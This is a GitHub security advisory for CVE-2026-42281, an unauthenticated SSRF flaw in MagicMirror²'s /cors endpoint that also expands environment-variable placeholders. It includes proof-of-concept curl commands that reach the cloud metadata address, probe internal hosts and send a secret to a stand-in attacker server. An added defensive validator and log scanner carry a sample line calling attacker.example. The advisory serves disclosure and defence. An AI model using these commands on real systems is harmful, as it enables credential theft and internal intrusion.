GHSA-ph6f-2cvq-79hq

Source
https://github.com/advisories/GHSA-ph6f-2cvq-79hq
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/05/GHSA-ph6f-2cvq-79hq/GHSA-ph6f-2cvq-79hq.json
JSON Data
https://api.osv.dev/v1/vulns/GHSA-ph6f-2cvq-79hq
Aliases
  • CVE-2026-42281
Published
2026-05-05T20:53:59Z
Modified
2026-05-05T21:01:20.698310Z
Severity
  • 9.2 (Critical) CVSS_V4 - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N
Summary
MagicMirror vulnerable to unauthenticated SSRF via /cors endpoint
Details

Summary

An unauthenticated Server-Side Request Forgery (SSRF) vulnerability in the /cors endpoint allows any remote attacker to force the MagicMirror² server to perform arbitrary HTTP requests to internal networks, cloud metadata services, and localhost services. The endpoint also expands environment variable placeholders (**VAR_NAME**), enabling exfiltration of server-side secrets.

Details

The /cors endpoint in js/server_functions.js (function cors(), lines 37-78) acts as an open HTTP proxy with no authentication and no URL validation. Any user-supplied URL is fetched server-side via fetch() and the full response is returned to the caller.

Additionally, the replaceSecretPlaceholder() function (lines 21-25) expands any **VARIABLE_NAME** pattern in the URL with the corresponding process.env value before the request is made, allowing an attacker to exfiltrate environment variables (e.g. API keys, tokens, database credentials).

Vulnerable code path:

GET /cors?url=<attacker-controlled-url>
  → replaceSecretPlaceholder(url)     // expands **ENV_VAR** → process.env.ENV_VAR
  → fetch(url)                        // no validation, no blocklist
  → response returned to attacker     // full body, status, headers

Key issues:
  • No authentication required
  • No URL validation or blocklist for private/reserved IP ranges
  • No restriction on URL scheme or destination
  • Environment variable expansion in URL before fetch

PoC

Prerequisites: a running MagicMirror² instance accessible on the network (default: http://<host>:8080).

1. Basic SSRF — access cloud metadata (AWS IMDSv1):

curl "http://<target>:8080/cors?url=http://169.254.169.254/latest/meta-data/"

If the server runs on AWS EC2 without IMDSv2 enforcement, this returns instance metadata including IAM role credentials.

2. Internal network scanning:

curl "http://<target>:8080/cors?url=http://192.168.1.1/"
curl "http://<target>:8080/cors?url=http://127.0.0.1:3000/"

The attacker can probe internal services by observing response status codes and timing.

3. Environment variable exfiltration:

curl "http://<target>:8080/cors?url=http://<attacker-server>/?leak=**SECRET_API_KEY**"

The server expands **SECRET_API_KEY** to the value of process.env.SECRET_API_KEY before making the request, sending the secret to the attacker-controlled server as a query parameter.
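The two defensive pieces a practitioner wants after the Details and PoC sections above: a validator that rejects the proxy targets the advisory describes (non-http(s) schemes, localhost, private and link-local address literals including the metadata address, credentials embedded in the URL, and any **VAR_NAME** placeholder) before anything is fetched, and a scanner that applies the same validator to access-log lines to flag past abuse of an open proxy endpoint. This is an added example written for this page, not MagicMirror's code and not the fix shipped in 2.36.0; the log line format, the host names, and the function names are assumptions.

```javascript
// Added example (not MagicMirror's own code): a defender-side validator for
// user-supplied proxy targets, plus a scanner that applies it to constructed
// access-log lines to surface abuse of an open /cors-style endpoint.
// Runs on Node.js; only the built-in URL and URLSearchParams classes are used.
"use strict";

// Matches the **VAR_NAME** placeholder syntax the advisory describes. A proxy
// target that still carries one of these must never reach the fetch, so the
// check runs on the raw string before any expansion could happen.
const ENV_PLACEHOLDER = /\*\*[A-Za-z_][A-Za-z0-9_]*\*\*/;

// Returns true for IPv4/IPv6 literals that must never be proxied to:
// unspecified, loopback, link-local (which includes 169.254.169.254),
// RFC 1918, CGNAT, multicast/reserved, and IPv4-mapped IPv6 forms of the same.
function isPrivateAddress(ip) {
  const v4 = /^(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})$/.exec(ip);
  if (v4) {
    const a = Number(v4[1]);
    const b = Number(v4[2]);
    return (
      a === 0 || a === 10 || a === 127 ||
      (a === 169 && b === 254) ||
      (a === 172 && b >= 16 && b <= 31) ||
      (a === 192 && b === 168) ||
      (a === 100 && b >= 64 && b <= 127) ||
      a >= 224
    );
  }
  // URL.hostname keeps the brackets around IPv6 literals; strip them.
  const v6 = ip.replace(/^\[|\]$/g, "").toLowerCase();
  if (v6 === "::" || v6 === "::1") return true;          // unspecified, loopback
  if (/^fe[89ab]/.test(v6)) return true;                 // link-local fe80::/10
  if (/^f[cd]/.test(v6)) return true;                    // unique-local fc00::/7
  const mapped = /^::ffff:(\d{1,3}(?:\.\d{1,3}){3})$/.exec(v6);
  if (mapped) return isPrivateAddress(mapped[1]);        // e.g. ::ffff:10.0.0.1
  return false;
}

// Decides whether a raw proxy target is acceptable. Only the literal host is
// checked here: the caller must still resolve the hostname, run every resolved
// address through isPrivateAddress(), and connect to that pinned address,
// otherwise DNS rebinding bypasses this check. The WHATWG URL parser
// normalises alternative IPv4 spellings (decimal, octal, hex), so they are
// covered by the literal check.
function classifyProxyTarget(rawUrl) {
  if (ENV_PLACEHOLDER.test(rawUrl)) {
    return { ok: false, reason: "env-placeholder" };
  }
  let parsed;
  try {
    parsed = new URL(rawUrl);
  } catch {
    return { ok: false, reason: "unparseable" };
  }
  if (parsed.protocol !== "http:" && parsed.protocol !== "https:") {
    return { ok: false, reason: "scheme" };
  }
  if (parsed.username || parsed.password) {
    return { ok: false, reason: "credentials-in-url" };
  }
  const host = parsed.hostname;
  if (host === "localhost" || host.endsWith(".localhost")) {
    return { ok: false, reason: "localhost" };
  }
  if (isPrivateAddress(host)) {
    return { ok: false, reason: "private-address" };
  }
  return { ok: true, reason: "", host };
}

// Constructed access-log lines in an assumed "<ts> <method> <path> <status>"
// format, not real MagicMirror output. The url parameter is URL-encoded as a
// client would send it; attacker.example stands in for the advisory's
// <attacker-server> placeholder.
const SAMPLE_LOG = [
  "2026-05-05T20:53:59Z GET /cors?url=https%3A%2F%2Fapi.example.com%2Fweather 200",
  "2026-05-05T20:54:01Z GET /cors?url=http%3A%2F%2F169.254.169.254%2Flatest%2Fmeta-data%2F 200",
  "2026-05-05T20:54:03Z GET /cors?url=http%3A%2F%2F127.0.0.1%3A3000%2F 502",
  "2026-05-05T20:54:05Z GET /cors?url=http%3A%2F%2Fattacker.example%2F%3Fleak%3D**SECRET_API_KEY** 200",
  "2026-05-05T20:54:07Z GET /index.html 200",
];

// Returns one record per /cors request whose target the validator rejects, so
// a detection pipeline can alert on it; all other log lines are ignored.
function flagCorsRequests(lines) {
  const flagged = [];
  for (const line of lines) {
    const fields = line.split(" ");
    if (fields.length < 4 || !fields[2].startsWith("/cors?")) continue;
    const query = new URLSearchParams(fields[2].slice("/cors?".length));
    const target = query.get("url");
    if (target === null) continue;
    const verdict = classifyProxyTarget(target);
    if (!verdict.ok) {
      flagged.push({ ts: fields[0], target, reason: verdict.reason, status: fields[3] });
    }
  }
  return flagged;
}

console.log(flagCorsRequests(SAMPLE_LOG));
```

Running the block prints three flagged records from the constructed log: the two private-address targets and the request that still carries a placeholder. In a handler, classifyProxyTarget() sits in front of the fetch and a rejected verdict ends the request with a 4xx; placing the placeholder check on the raw string means a secret can never be substituted into a destination the validator has not accepted. Authentication for the endpoint is a separate control that this validator does not replace.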

Impact

  • Cloud deployments (AWS/GCP/Azure): full compromise of cloud instance credentials via metadata service (169.254.169.254), potentially leading to lateral movement within the cloud account
  • Internal network access: the server becomes a proxy to scan and interact with services on internal networks that are not directly reachable by the attacker
  • Secret exfiltration: environment variables containing API keys, database credentials, or other sensitive configuration are directly readable
  • Affected users: anyone running MagicMirror² exposed to an untrusted network (including LAN). The /cors endpoint requires no authentication, so any host that can reach the MagicMirror HTTP port can exploit this vulnerability
Database specific
{
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-05T20:53:59Z",
    "cwe_ids": [
        "CWE-918"
    ],
    "severity": "CRITICAL",
    "nvd_published_at": null
}
Affected packages

npm / magicmirror

Affected ranges
  Type: SEMVER
  Events
    Introduced: 0 (unknown introduced version; all previous versions are affected)
    Fixed: 2.36.0

Database specific
  source: "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/05/GHSA-ph6f-2cvq-79hq/GHSA-ph6f-2cvq-79hq.json"
  last_known_affected_version_range: "<= 2.35.0"